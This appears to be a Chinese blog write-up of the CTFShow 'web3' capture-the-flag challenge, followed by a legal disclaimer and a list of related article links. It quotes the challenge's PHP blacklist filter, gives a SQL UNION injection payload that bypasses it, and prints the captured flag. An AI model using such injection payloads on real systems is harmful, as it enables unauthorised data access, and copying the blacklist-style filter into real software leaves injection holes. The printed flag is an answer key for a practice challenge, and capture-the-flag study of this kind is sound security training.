【CTF Web】CTFShow web3 Writeup(SQL注入+PHP+UNION注入)

web3

1

管理员被狠狠的教育了,所以决定好好修复一番。这次没问题了。


解法

注意到:

html 复制代码
<!-- flag in id = 1000 -->

但是拦截很多种字符。

php 复制代码
if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
        die("id error");
}

使用UNION注入:

sql 复制代码
?id=1 and 1=0 union select * from article where id=1000

取得 flag。

Flag

bash 复制代码
ctfshow{2dc7e880-3e21-4599-9c2b-c9b4a8009889}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的 。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为 ,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的 。对于因使用这些技术而导致的任何后果,博主不承担任何责任

相关推荐
飞Link几秒前
LangGraph 核心架构解析:节点 (Nodes) 与边 (Edges) 的工作机制及实战指南
java·开发语言·python·算法·架构
赵侃侃爱分享2 分钟前
AI怎么定义网络安全
人工智能·安全·web安全
一直都在5726 分钟前
MySQL索引优化
android·数据库·mysql
步步为营DotNet9 分钟前
深度探索.NET Aspire在云原生应用性能与安全加固的创新实践
安全·云原生·.net
wjp@00121 分钟前
SQL server导出导入数据
运维·服务器·数据库
脑子加油站21 分钟前
MySQL8数据库高级特性
数据库·mysql
vortex531 分钟前
从应用层到内核层:SOCKS 代理与 TUN 模式全解析
网络·网络安全·渗透测试
武藤一雄33 分钟前
WPF中ViewModel之间的5种通讯方式
开发语言·前端·microsoft·c#·wpf
XiYang-DING35 分钟前
【Java】堆
java·开发语言
Lyyaoo.39 分钟前
【Java基础面经】Java 反射机制
java·开发语言·python